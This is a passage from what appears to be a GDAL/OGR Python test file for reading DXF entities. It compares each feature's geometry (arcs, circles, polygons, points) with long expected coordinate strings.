0,5.87938524157182 3.65797985667433 0,5.8270909152852 3.5932633569242 0,5.76589518571785 3.53052843721411 0,5.69609619231285 3.4700807357668 0,5.61803398874989 3.41221474770753 0,5.53208888623796 3.35721239031346 0,5.4386796006773 3.305341629541 0,5.33826121271772 3.25685517452261 0,5.23132295065132 3.21198924639328 0,5.11838580694149 3.17096242744496 0,5.0 3.13397459621556 0,4.87674229357815 3.10120595370083 0,4.74921318683182 3.07281614543321 0,4.61803398874989 3.04894348370485 0,4.48384379119934 3.029704273724 0,4.34729635533386 3.01519224698779 0,4.20905692653531 3.00547810463173 0,4.069798993405 3.0006091729809 0,3.930201006595 3.0006091729809 0,3.79094307346469 3.00547810463173 0,3.65270364466614 3.01519224698779 0,3.51615620880066 3.029704273724 0,3.38196601125011 3.04894348370485 0,3.25078681316818 3.07281614543321 0,3.12325770642185 3.10120595370083 0,3.0 3.13397459621556 0,2.88161419305851 3.17096242744496 0,2.76867704934868 3.21198924639328 0,2.66173878728228 3.25685517452261 0,2.5613203993227 3.305341629541 0,2.46791111376204 3.35721239031346 0,2.38196601125011 3.41221474770753 0,2.30390380768715 3.4700807357668 0,2.23410481428215 3.53052843721411 0,2.1729090847148 3.5932633569242 0,2.12061475842818 3.65797985667433 0,2.07747660812336 3.724362644183 0,2.04370479853239 3.79208830918224 0,2.01946386251686 3.86082689903993 0,2.00487189948035 3.93024352625587 0,2 4 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2 4 0,2.00487189948035 4.06975647374412 0,2.01946386251686 4.13917310096007 0,2.04370479853239 4.20791169081776 0,2.07747660812336 4.275637355817 0,2.12061475842818 4.34202014332567 0,2.1729090847148 4.4067366430758 0,2.23410481428215 4.46947156278589 0,2.30390380768715 4.52991926423321 0,2.38196601125011 4.58778525229247 0,2.46791111376204 4.64278760968654 0,2.5613203993227 4.694658370459 0,2.66173878728228 4.74314482547739 0,2.76867704934868 4.78801075360672 0,2.88161419305851 4.82903757255504 0,3.0 4.86602540378444 0,3.12325770642185 4.89879404629917 0,3.25078681316818 4.92718385456679 0,3.38196601125011 4.95105651629515 0,3.51615620880067 4.970295726276 0,3.65270364466614 4.98480775301221 0,3.79094307346469 4.99452189536827 0,3.930201006595 4.9993908270191 0,4.069798993405 4.9993908270191 0,4.20905692653531 4.99452189536827 0,4.34729635533386 4.98480775301221 0,4.48384379119934 4.970295726276 0,4.61803398874989 4.95105651629515 0,4.74921318683182 4.92718385456679 0,4.87674229357816 4.89879404629917 0,5.0 4.86602540378444 0,5.11838580694149 4.82903757255504 0,5.23132295065132 4.78801075360672 0,5.33826121271772 4.74314482547739 0,5.4386796006773 4.694658370459 0,5.53208888623796 4.64278760968654 0,5.61803398874989 4.58778525229247 0,5.69609619231285 4.5299192642332 0,5.76589518571785 4.46947156278589 0,5.8270909152852 4.4067366430758 0,5.87938524157182 4.34202014332567 0,5.92252339187664 4.275637355817 0,5.95629520146761 4.20791169081776 0,5.98053613748314 4.13917310096006 0,5.99512810051965 4.06975647374412 0,6.0 4.0 0,5.99512810051965 3.93024352625587 0,5.98053613748314 3.86082689903993 0,5.95629520146761 3.79208830918224 0,5.92252339187664 3.724362644183 0,5.87938524157182 3.65797985667433 0,5.8270909152852 3.5932633569242 0,5.76589518571785 3.53052843721411 0,5.69609619231285 3.4700807357668 0,5.61803398874989 3.41221474770753 0,5.53208888623796 3.35721239031346 0,5.4386796006773 3.305341629541 0,5.33826121271772 3.25685517452261 0,5.23132295065132 3.21198924639328 0,5.11838580694149 3.17096242744496 0,5.0 3.13397459621556 0,4.87674229357815 3.10120595370083 0,4.74921318683182 3.07281614543321 0,4.61803398874989 3.04894348370485 0,4.48384379119934 3.029704273724 0,4.34729635533386 3.01519224698779 0,4.20905692653531 3.00547810463173 0,4.069798993405 3.0006091729809 0,3.930201006595 3.0006091729809 0,3.79094307346469 3.00547810463173 0,3.65270364466614 3.01519224698779 0,3.51615620880066 3.029704273724 0,3.38196601125011 3.04894348370485 0,3.25078681316818 3.07281614543321 0,3.12325770642185 3.10120595370083 0,3.0 3.13397459621556 0,2.88161419305851 3.17096242744496 0,2.76867704934868 3.21198924639328 0,2.66173878728228 3.25685517452261 0,2.5613203993227 3.305341629541 0,2.46791111376204 3.35721239031346 0,2.38196601125011 3.41221474770753 0,2.30390380768715 3.4700807357668 0,2.23410481428215 3.53052843721411 0,2.1729090847148 3.5932633569242 0,2.12061475842818 3.65797985667433 0,2.07747660812336 3.724362644183 0,2.04370479853239 3.79208830918224 0,2.01946386251686 3.86082689903993 0,2.00487189948035 3.93024352625587 0,2 4 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):6
# EntityHandle (String) = 1F9
# LINESTRING Z (2.0 2.0 0,1.96657794502105 2.03582232791524 0,1.93571660708646 2.07387296203834 0,1.90756413746468 2.11396923855471 0,1.88225568337755 2.15591867344963 0,1.85991273921989 2.19951988653655 0,1.84064256332004 2.24456356819194 0,1.8245376630414 2.29083348415575 0,1.81167535069652 2.33810751357387 0,1.80211737240583 2.38615871529951 0,1.79590961168258 2.43475641733454 0,1.79308186916688 2.48366732418105 0,1.79364771956639 2.53265663678705 0,1.79760444649032 2.58148917971011 0,1.80493305548955 2.62993053008785 0,1.81559836524041 2.67774814299566 0,1.8295491764342 2.72471246778926 0,1.84671851756181 2.7705980500731 0,1.86702396641357 2.81518461400453 0,1.89036804575079 2.85825811973811 0,1.91663869124976 2.89961179093366 0,1.94570978947168 2.93904710739563 0,1.97744178327594 2.97637475807832 0,2.01168234177068 3.01141554988232 0,2.04826709158413 3.04400126787917 0,2.08702040594658 3.07397548283483 0,2.12775624779472 3.10119430215541 0,2.17027906285109 3.12552706065018 0,2.2143847183914 3.14685694779575 0,2.25986148319297 3.16508156849045 0,2.30649104396024 3.18011343460661 0,2.35404955334774 3.1918803849814 0,2.40230870454951 3.20032593182975 0,2.45103682729644 3.2054095319166 0,2.5 3.20710678118655 0,2.54896317270356 3.2054095319166 0,2.59769129545049 3.20032593182975 0,2.64595044665226 3.1918803849814 0,2.69350895603976 3.18011343460661 0,2.74013851680703 3.16508156849045 0,2.7856152816086 3.14685694779575 0,2.8297209371489 3.12552706065018 0,2.87224375220528 3.10119430215541 0,2.91297959405342 3.07397548283483 0,2.95173290841587 3.04400126787917 0,2.98831765822932 3.01141554988232 0,3.02255821672406 2.97637475807832 0,3.05429021052832 2.93904710739563 0,3.08336130875024 2.89961179093367 0,3.10963195424921 2.85825811973811 0,3.13297603358643 2.81518461400453 0,3.15328148243819 2.7705980500731 0,3.1704508235658 2.72471246778926 0,3.18440163475959 2.67774814299567 0,3.19506694451045 2.62993053008786 0,3.20239555350968 2.58148917971011 0,3.20635228043361 2.53265663678705 0,3.20691813083312 2.48366732418105 0,3.20409038831742 2.43475641733454 0,3.19788262759417 2.38615871529951 0,3.18832464930348 2.33810751357387 0,3.1754623369586 2.29083348415575 0,3.15935743667996 2.24456356819194 0,3.14008726078011 2.19951988653655 0,3.11774431662245 2.15591867344963 0,3.09243586253532 2.11396923855472 0,3.06428339291354 2.07387296203834 0,3.03342205497895 2.03582232791524 0,3 2 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (2.0 2.0 0,1.96657794502105 2.03582232791524 0,1.93571660708646 2.07387296203834 0,1.90756413746468 2.11396923855471 0,1.88225568337755 2.15591867344963 0,1.85991273921989 2.19951988653655 0,1.84064256332004 2.24456356819194 0,1.8245376630414 2.29083348415575 0,1.81167535069652 2.33810751357387 0,1.80211737240583 2.38615871529951 0,1.79590961168258 2.43475641733454 0,1.79308186916688 2.48366732418105 0,1.79364771956639 2.53265663678705 0,1.79760444649032 2.58148917971011 0,1.80493305548955 2.62993053008785 0,1.81559836524041 2.67774814299566 0,1.8295491764342 2.72471246778926 0,1.84671851756181 2.7705980500731 0,1.86702396641357 2.81518461400453 0,1.89036804575079 2.85825811973811 0,1.91663869124976 2.89961179093366 0,1.94570978947168 2.93904710739563 0,1.97744178327594 2.97637475807832 0,2.01168234177068 3.01141554988232 0,2.04826709158413 3.04400126787917 0,2.08702040594658 3.07397548283483 0,2.12775624779472 3.10119430215541 0,2.17027906285109 3.12552706065018 0,2.2143847183914 3.14685694779575 0,2.25986148319297 3.16508156849045 0,2.30649104396024 3.18011343460661 0,2.35404955334774 3.1918803849814 0,2.40230870454951 3.20032593182975 0,2.45103682729644 3.2054095319166 0,2.5 3.20710678118655 0,2.54896317270356 3.2054095319166 0,2.59769129545049 3.20032593182975 0,2.64595044665226 3.1918803849814 0,2.69350895603976 3.18011343460661 0,2.74013851680703 3.16508156849045 0,2.7856152816086 3.14685694779575 0,2.8297209371489 3.12552706065018 0,2.87224375220528 3.10119430215541 0,2.91297959405342 3.07397548283483 0,2.95173290841587 3.04400126787917 0,2.98831765822932 3.01141554988232 0,3.02255821672406 2.97637475807832 0,3.05429021052832 2.93904710739563 0,3.08336130875024 2.89961179093367 0,3.10963195424921 2.85825811973811 0,3.13297603358643 2.81518461400453 0,3.15328148243819 2.7705980500731 0,3.1704508235658 2.72471246778926 0,3.18440163475959 2.67774814299567 0,3.19506694451045 2.62993053008786 0,3.20239555350968 2.58148917971011 0,3.20635228043361 2.53265663678705 0,3.20691813083312 2.48366732418105 0,3.20409038831742 2.43475641733454 0,3.19788262759417 2.38615871529951 0,3.18832464930348 2.33810751357387 0,3.1754623369586 2.29083348415575 0,3.15935743667996 2.24456356819194 0,3.14008726078011 2.19951988653655 0,3.11774431662245 2.15591867344963 0,3.09243586253532 2.11396923855472 0,3.06428339291354 2.07387296203834 0,3.03342205497895 2.03582232791524 0,3 2 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):7
# EntityHandle (String) = 1FA
# POLYGON Z ((1 2 0,1 3 0,2 3 0,2 2 0,1 2 0))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((1 2 0,1 3 0,2 3 0,2 2 0,1 2 0))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):8
# EntityHandle (String) = 1FB
# POLYGON ((3 4,4 4,4 3,3 3,3 4))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((3 4,4 4,4 3,3 3,3 4))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):9
# EntityHandle (String) = 1FD
# POLYGON ((8 8,9 8,9 9,8 9,8 8))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((8 8,9 8,9 9,8 9,8 8))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):10
# EntityHandle (String) = 200
# LINESTRING (2 2,2.15384615384615 2.15384615384615,2.30769230769231 2.30769230769231,2.46153846153846 2.46153846153846,2.61538461538461 2.61538461538461,2.76923076923077 2.76923076923077,2.92307692307692 2.92307692307692,3.07692307692308 3.07692307692308,3.23076923076923 3.23076923076923,3.38461538461538 3.38461538461538,3.53846153846154 3.53846153846154,3.69230769230769 3.69230769230769,3.84615384615385 3.84615384615385,4 4,4.15384615384615 4.15384615384615,4.30769230769231 4.30769230769231,4.46153846153846 4.46153846153846,4.61538461538462 4.61538461538462,4.76923076923077 4.76923076923077,4.92307692307692 4.92307692307692,5.07692307692308 5.07692307692308,5.23076923076923 5.23076923076923,5.38461538461538 5.38461538461538,5.53846153846154 5.53846153846154,5.69230769230769 5.69230769230769,5.84615384615385 5.84615384615385,6.0 6.0,6.15384615384615 6.15384615384615,6.30769230769231 6.30769230769231,6.46153846153846 6.46153846153846,6.61538461538462 6.61538461538462,6.76923076923077 6.76923076923077,6.92307692307692 6.92307692307692,7.07692307692308 7.07692307692308,7.23076923076923 7.23076923076923,7.38461538461539 7.38461538461539,7.53846153846154 7.53846153846154,7.69230769230769 7.69230769230769,7.84615384615385 7.84615384615385,8 8)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (2 2,2.15384615384615 2.15384615384615,2.30769230769231 2.30769230769231,2.46153846153846 2.46153846153846,2.61538461538461 2.61538461538461,2.76923076923077 2.76923076923077,2.92307692307692 2.92307692307692,3.07692307692308 3.07692307692308,3.23076923076923 3.23076923076923,3.38461538461538 3.38461538461538,3.53846153846154 3.53846153846154,3.69230769230769 3.69230769230769,3.84615384615385 3.84615384615385,4 4,4.15384615384615 4.15384615384615,4.30769230769231 4.30769230769231,4.46153846153846 4.46153846153846,4.61538461538462 4.61538461538462,4.76923076923077 4.76923076923077,4.92307692307692 4.92307692307692,5.07692307692308 5.07692307692308,5.23076923076923 5.23076923076923,5.38461538461538 5.38461538461538,5.53846153846154 5.53846153846154,5.69230769230769 5.69230769230769,5.84615384615385 5.84615384615385,6.0 6.0,6.15384615384615 6.15384615384615,6.30769230769231 6.30769230769231,6.46153846153846 6.46153846153846,6.61538461538462 6.61538461538462,6.76923076923077 6.76923076923077,6.92307692307692 6.92307692307692,7.07692307692308 7.07692307692308,7.23076923076923 7.23076923076923,7.38461538461539 7.38461538461539,7.53846153846154 7.53846153846154,7.69230769230769 7.69230769230769,7.84615384615385 7.84615384615385,8 8)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):11
# EntityHandle (String) = 201
# LINESTRING (8 1,7.62837370825536 0.987348067229724,7.25775889681215 0.975707614760869,6.88916704597178 0.966090122894857,6.52360963603567 0.959507071933107,6.16209814730525 0.956969942177043,5.80564406008193 0.959490213928084,5.45525885466714 0.968079367487651,5.11195401136229 0.983748883157167,4.77674101046882 1.00751024123805,4.45063133228814 1.04037492203173,4.13463645712167 1.08335440583961,3.82976786527082 1.13746017296313,3.53703703703704 1.2037037037037,3.25745545272173 1.28309647836275,2.99203459262631 1.37664997724169,2.74178593705221 1.48537568064195,2.50772096630085 1.61028506886495,2.29085116067365 1.75238962221211,2.09218800047203 1.91270082098484,1.91270082098485 2.09218800047202,1.75238962221211 2.29085116067364,1.61028506886495 2.50772096630085,1.48537568064195 2.74178593705221,1.37664997724169 2.99203459262631,1.28309647836275 3.25745545272172,1.2037037037037 3.53703703703703,1.13746017296313 3.82976786527082,1.08335440583961 4.13463645712166,1.04037492203173 4.45063133228814,1.00751024123805 4.77674101046882,0.983748883157167 5.11195401136229,0.968079367487652 5.45525885466714,0.959490213928084 5.80564406008193,0.956969942177043 6.16209814730525,0.959507071933108 6.52360963603567,0.966090122894857 6.88916704597178,0.975707614760869 7.25775889681216,0.987348067229724 7.62837370825537,1 8)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (8 1,7.62837370825536 0.987348067229724,7.25775889681215 0.975707614760869,6.88916704597178 0.966090122894857,6.52360963603567 0.959507071933107,6.16209814730525 0.956969942177043,5.80564406008193 0.959490213928084,5.45525885466714 0.968079367487651,5.11195401136229 0.983748883157167,4.77674101046882 1.00751024123805,4.45063133228814 1.04037492203173,4.13463645712167 1.08335440583961,3.82976786527082 1.13746017296313,3.53703703703704 1.2037037037037,3.25745545272173 1.28309647836275,2.99203459262631 1.37664997724169,2.74178593705221 1.48537568064195,2.50772096630085 1.61028506886495,2.29085116067365 1.75238962221211,2.09218800047203 1.91270082098484,1.91270082098485 2.09218800047202,1.75238962221211 2.29085116067364,1.61028506886495 2.50772096630085,1.48537568064195 2.74178593705221,1.37664997724169 2.99203459262631,1.28309647836275 3.25745545272172,1.2037037037037 3.53703703703703,1.13746017296313 3.82976786527082,1.08335440583961 4.13463645712166,1.04037492203173 4.45063133228814,1.00751024123805 4.77674101046882,0.983748883157167 5.11195401136229,0.968079367487652 5.45525885466714,0.959490213928084 5.80564406008193,0.956969942177043 6.16209814730525,0.959507071933108 6.52360963603567,0.966090122894857 6.88916704597178,0.975707614760869 7.25775889681216,0.987348067229724 7.62837370825537,1 8)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):12
# EntityHandle (String) = 202
# POINT Z (7 7 0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (7 7 0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):13
# EntityHandle (String) = 203
# POINT Z (-4 4 -5e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (-4 4 -5e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):14
# EntityHandle (String) = 204
# LINESTRING Z (0 0 0,-1 1 -1e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0 0 0,-1 1 -1e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):15
# EntityHandle (String) = 205
# LINESTRING (-1 1,-2 1,-1 2,-1 1)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (-1 1,-2 1,-1 2,-1 1)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):16
# EntityHandle (String) = 206
# LINESTRING Z (-1 1 -1e-16,-1 2 -1e-16,-2 2 -2e-16,-1 1 -1e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-1 1 -1e-16,-1 2 -1e-16,-2 2 -2e-16,-1 1 -1e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):17
# EntityHandle (String) = 20B
# LINESTRING Z (-6 4 -6e-16,-5.99512810051965 3.86048705251175 -5.99512810051965e-16,-5.98053613748314 3.72165379807987 -5.98053613748314e-16,-5.95629520146761 3.58417661836448 -5.95629520146761e-16,-5.92252339187664 3.448725288366 -5.92252339187664e-16,-5.87938524157182 3.31595971334866 -5.87938524157182e-16,-5.8270909152852 3.1865267138484 -5.8270909152852e-16,-5.76589518571785 3.06105687442822 -5.76589518571785e-16,-5.69609619231285 2.94016147153359 -5.69609619231285e-16,-5.61803398874989 2.82442949541505 -5.61803398874989e-16,-5.53208888623796 2.71442478062692 -5.53208888623796e-16,-5.4386796006773 2.61068325908201 -5.4386796006773e-16,-5.33826121271772 2.51371034904521 -5.33826121271772e-16,-5.23132295065132 2.42397849278656 -5.23132295065132e-16,-5.11838580694149 2.34192485488992 -5.11838580694149e-16,-5.0 2.26794919243112 -5e-16,-4.87674229357815 2.20241190740167 -4.87674229357815e-16,-4.74921318683182 2.14563229086643 -4.74921318683182e-16,-4.61803398874989 2.09788696740969 -4.61803398874989e-16,-4.48384379119934 2.05940854744801 -4.48384379119934e-16,-4.34729635533386 2.03038449397558 -4.34729635533386e-16,-4.20905692653531 2.01095620926345 -4.20905692653531e-16,-4.069798993405 2.00121834596181 -4.069798993405e-16,-3.930201006595 2.00121834596181 -3.930201006595e-16,-3.79094307346469 2.01095620926345 -3.79094307346469e-16,-3.65270364466614 2.03038449397558 -3.65270364466614e-16,-3.51615620880066 2.05940854744801 -3.51615620880066e-16,-3.38196601125011 2.09788696740969 -3.3819660112501e-16,-3.25078681316818 2.14563229086643 -3.25078681316818e-16,-3.12325770642185 2.20241190740167 -3.12325770642185e-16,-3.0 2.26794919243112 -3e-16,-2.88161419305851 2.34192485488992 -2.88161419305851e-16,-2.76867704934868 2.42397849278656 -2.76867704934868e-16,-2.66173878728228 2.51371034904521 -2.66173878728228e-16,-2.5613203993227 2.61068325908201 -2.5613203993227e-16,-2.46791111376204 2.71442478062692 -2.46791111376204e-16,-2.38196601125011 2.82442949541505 -2.3819660112501e-16,-2.30390380768715 2.94016147153359 -2.30390380768715e-16,-2.23410481428215 3.06105687442822 -2.23410481428215e-16,-2.1729090847148 3.1865267138484 -2.1729090847148e-16,-2.12061475842818 3.31595971334866 -2.12061475842818e-16,-2.07747660812336 3.448725288366 -2.07747660812336e-16,-2.04370479853239 3.58417661836448 -2.04370479853239e-16,-2.01946386251686 3.72165379807987 -2.01946386251686e-16,-2.00487189948035 3.86048705251175 -2.00487189948035e-16,-2.0 4.0 -2e-16,-2.00487189948035 4.13951294748825 -2.00487189948035e-16,-2.01946386251686 4.27834620192013 -2.01946386251686e-16,-2.04370479853239 4.41582338163552 -2.04370479853239e-16,-2.07747660812336 4.551274711634 -2.07747660812336e-16,
# -2.12061475842818 4.68404028665134 -2.12061475842818e-16,-2.1729090847148 4.8134732861516 -2.1729090847148e-16,-2.23410481428215 4.93894312557178 -2.23410481428215e-16,-2.30390380768715 5.05983852846641 -2.30390380768715e-16,-2.38196601125011 5.17557050458495 -2.3819660112501e-16,-2.46791111376204 5.28557521937308 -2.46791111376204e-16,-2.5613203993227 5.38931674091799 -2.5613203993227e-16,-2.66173878728228 5.48628965095479 -2.66173878728228e-16,-2.76867704934868 5.57602150721344 -2.76867704934868e-16,-2.88161419305851 5.65807514511008 -2.88161419305851e-16,-3.0 5.73205080756888 -3e-16,-3.12325770642184 5.79758809259833 -3.12325770642184e-16,-3.25078681316818 5.85436770913357 -3.25078681316817e-16,-3.38196601125011 5.90211303259031 -3.3819660112501e-16,-3.51615620880066 5.94059145255199 -3.51615620880066e-16,-3.65270364466614 5.96961550602442 -3.65270364466614e-16,-3.79094307346469 5.98904379073655 -3.79094307346469e-16,-3.930201006595 5.99878165403819 -3.930201006595e-16,-4.069798993405 5.99878165403819 -4.069798993405e-16,-4.20905692653531 5.98904379073655 -4.20905692653531e-16,-4.34729635533386 5.96961550602442 -4.34729635533386e-16,-4.48384379119933 5.94059145255199 -4.48384379119933e-16,-4.61803398874989 5.90211303259031 -4.61803398874989e-16,-4.74921318683182 5.85436770913357 -4.74921318683182e-16,-4.87674229357815 5.79758809259833 -4.87674229357815e-16,-5.0 5.73205080756888 -5e-16,-5.11838580694149 5.65807514511008 -5.11838580694149e-16,-5.23132295065132 5.57602150721344 -5.23132295065132e-16,-5.33826121271772 5.48628965095479 -5.33826121271772e-16,-5.4386796006773 5.389316740918 -5.4386796006773e-16,-5.53208888623796 5.28557521937308 -5.53208888623796e-16,-5.61803398874989 5.17557050458495 -5.61803398874989e-16,-5.69609619231285 5.05983852846641 -5.69609619231285e-16,-5.76589518571785 4.93894312557178 -5.76589518571785e-16,-5.8270909152852 4.8134732861516 -5.8270909152852e-16,-5.87938524157182 4.68404028665134 -5.87938524157182e-16,-5.92252339187664 4.551274711634 -5.92252339187664e-16,-5.95629520146761 4.41582338163552 -5.95629520146761e-16,-5.98053613748314 4.27834620192013 -5.98053613748314e-16,-5.99512810051965 4.13951294748825 -5.99512810051965e-16,-6.0 4.0 -6e-16)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-6 4 -6e-16,-5.99512810051965 3.86048705251175 -5.99512810051965e-16,-5.98053613748314 3.72165379807987 -5.98053613748314e-16,-5.95629520146761 3.58417661836448 -5.95629520146761e-16,-5.92252339187664 3.448725288366 -5.92252339187664e-16,-5.87938524157182 3.31595971334866 -5.87938524157182e-16,-5.8270909152852 3.1865267138484 -5.8270909152852e-16,-5.76589518571785 3.06105687442822 -5.76589518571785e-16,-5.69609619231285 2.94016147153359 -5.69609619231285e-16,-5.61803398874989 2.82442949541505 -5.61803398874989e-16,-5.53208888623796 2.71442478062692 -5.53208888623796e-16,-5.4386796006773 2.61068325908201 -5.4386796006773e-16,-5.33826121271772 2.51371034904521 -5.33826121271772e-16,-5.23132295065132 2.42397849278656 -5.23132295065132e-16,-5.11838580694149 2.34192485488992 -5.11838580694149e-16,-5.0 2.26794919243112 -5e-16,-4.87674229357815 2.20241190740167 -4.87674229357815e-16,-4.74921318683182 2.14563229086643 -4.74921318683182e-16,-4.61803398874989 2.09788696740969 -4.61803398874989e-16,-4.48384379119934 2.05940854744801 -4.48384379119934e-16,-4.34729635533386 2.03038449397558 -4.34729635533386e-16,-4.20905692653531 2.01095620926345 -4.20905692653531e-16,-4.069798993405 2.00121834596181 -4.069798993405e-16,-3.930201006595 2.00121834596181 -3.930201006595e-16,-3.79094307346469 2.01095620926345 -3.79094307346469e-16,-3.65270364466614 2.03038449397558 -3.65270364466614e-16,-3.51615620880066 2.05940854744801 -3.51615620880066e-16,-3.38196601125011 2.09788696740969 -3.3819660112501e-16,-3.25078681316818 2.14563229086643 -3.25078681316818e-16,-3.12325770642185 2.20241190740167 -3.12325770642185e-16,-3.0 2.26794919243112 -3e-16,-2.88161419305851 2.34192485488992 -2.88161419305851e-16,-2.76867704934868 2.42397849278656 -2.76867704934868e-16,-2.66173878728228 2.51371034904521 -2.66173878728228e-16,-2.5613203993227 2.61068325908201 -2.5613203993227e-16,-2.46791111376204 2.71442478062692 -2.46791111376204e-16,-2.38196601125011 2.82442949541505 -2.3819660112501e-16,-2.30390380768715 2.94016147153359 -2.30390380768715e-16,-2.23410481428215 3.06105687442822 -2.23410481428215e-16,-2.1729090847148 3.1865267138484 -2.1729090847148e-16,-2.12061475842818 3.31595971334866 -2.12061475842818e-16,-2.07747660812336 3.448725288366 -2.07747660812336e-16,-2.04370479853239 3.58417661836448 -2.04370479853239e-16,-2.01946386251686 3.72165379807987 -2.01946386251686e-16,-2.00487189948035 3.86048705251175 -2.00487189948035e-16,-2.0 4.0 -2e-16,-2.00487189948035 4.13951294748825 -2.00487189948035e-16,-2.01946386251686 4.27834620192013 -2.01946386251686e-16,-2.04370479853239 4.41582338163552 -2.04370479853239e-16,' + \
'-2.07747660812336 4.551274711634 -2.07747660812336e-16,-2.12061475842818 4.68404028665134 -2.12061475842818e-16,-2.1729090847148 4.8134732861516 -2.1729090847148e-16,-2.23410481428215 4.93894312557178 -2.23410481428215e-16,-2.30390380768715 5.05983852846641 -2.30390380768715e-16,-2.38196601125011 5.17557050458495 -2.3819660112501e-16,-2.46791111376204 5.28557521937308 -2.46791111376204e-16,-2.5613203993227 5.38931674091799 -2.5613203993227e-16,-2.66173878728228 5.48628965095479 -2.66173878728228e-16,-2.76867704934868 5.57602150721344 -2.76867704934868e-16,-2.88161419305851 5.65807514511008 -2.88161419305851e-16,-3.0 5.73205080756888 -3e-16,-3.12325770642184 5.79758809259833 -3.12325770642184e-16,-3.25078681316818 5.85436770913357 -3.25078681316817e-16,-3.38196601125011 5.90211303259031 -3.3819660112501e-16,-3.51615620880066 5.94059145255199 -3.51615620880066e-16,-3.65270364466614 5.96961550602442 -3.65270364466614e-16,-3.79094307346469 5.98904379073655 -3.79094307346469e-16,-3.930201006595 5.99878165403819 -3.930201006595e-16,-4.069798993405 5.99878165403819 -4.069798993405e-16,-4.20905692653531 5.98904379073655 -4.20905692653531e-16,-4.34729635533386 5.96961550602442 -4.34729635533386e-16,-4.48384379119933 5.94059145255199 -4.48384379119933e-16,-4.61803398874989 5.90211303259031 -4.61803398874989e-16,-4.74921318683182 5.85436770913357 -4.74921318683182e-16,-4.87674229357815 5.79758809259833 -4.87674229357815e-16,-5.0 5.73205080756888 -5e-16,-5.11838580694149 5.65807514511008 -5.11838580694149e-16,-5.23132295065132 5.57602150721344 -5.23132295065132e-16,-5.33826121271772 5.48628965095479 -5.33826121271772e-16,-5.4386796006773 5.389316740918 -5.4386796006773e-16,-5.53208888623796 5.28557521937308 -5.53208888623796e-16,-5.61803398874989 5.17557050458495 -5.61803398874989e-16,-5.69609619231285 5.05983852846641 -5.69609619231285e-16,-5.76589518571785 4.93894312557178 -5.76589518571785e-16,-5.8270909152852 4.8134732861516 -5.8270909152852e-16,-5.87938524157182 4.68404028665134 -5.87938524157182e-16,-5.92252339187664 4.551274711634 -5.92252339187664e-16,-5.95629520146761 4.41582338163552 -5.95629520146761e-16,-5.98053613748314 4.27834620192013 -5.98053613748314e-16,-5.99512810051965 4.13951294748825 -5.99512810051965e-16,-6.0 4.0 -6e-16)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):18
# EntityHandle (String) = 20C
# LINESTRING Z (-2 4 -3e-16,-2.00487189948035 4.06975647374412 -3.00487189948035e-16,-2.01946386251686 4.13917310096007 -3.01946386251686e-16,-2.04370479853239 4.20791169081776 -3.04370479853239e-16,-2.07747660812336 4.275637355817 -3.07747660812336e-16,-2.12061475842818 4.34202014332567 -3.12061475842818e-16,-2.1729090847148 4.4067366430758 -3.1729090847148e-16,-2.23410481428215 4.46947156278589 -3.23410481428215e-16,-2.30390380768715 4.52991926423321 -3.30390380768715e-16,-2.38196601125011 4.58778525229247 -3.38196601125011e-16,-2.46791111376204 4.64278760968654 -3.46791111376204e-16,-2.5613203993227 4.694658370459 -3.5613203993227e-16,-2.66173878728228 4.74314482547739 -3.66173878728228e-16,-2.76867704934868 4.78801075360672 -3.76867704934868e-16,-2.88161419305851 4.82903757255504 -3.88161419305851e-16,-3.0 4.86602540378444 -4e-16,-3.12325770642185 4.89879404629917 -4.12325770642185e-16,-3.25078681316818 4.92718385456679 -4.25078681316818e-16,-3.38196601125011 4.95105651629515 -4.38196601125011e-16,-3.51615620880067 4.970295726276 -4.51615620880067e-16,-3.65270364466614 4.98480775301221 -4.65270364466614e-16,-3.79094307346469 4.99452189536827 -4.79094307346469e-16,-3.930201006595 4.9993908270191 -4.930201006595e-16,-4.069798993405 4.9993908270191 -5.069798993405e-16,-4.20905692653531 4.99452189536827 -5.20905692653531e-16,-4.34729635533386 4.98480775301221 -5.34729635533386e-16,-4.48384379119934 4.970295726276 -5.48384379119934e-16,-4.61803398874989 4.95105651629515 -5.6180339887499e-16,-4.74921318683182 4.92718385456679 -5.74921318683183e-16,-4.87674229357816 4.89879404629917 -5.87674229357816e-16,-5.0 4.86602540378444 -6e-16,-5.11838580694149 4.82903757255504 -6.1183858069415e-16,-5.23132295065132 4.78801075360672 -6.23132295065132e-16,-5.33826121271772 4.74314482547739 -6.33826121271772e-16,-5.4386796006773 4.694658370459 -6.4386796006773e-16,-5.53208888623796 4.64278760968654 -6.53208888623796e-16,-5.61803398874989 4.58778525229247 -6.61803398874989e-16,-5.69609619231285 4.5299192642332 -6.69609619231285e-16,-5.76589518571785 4.46947156278589 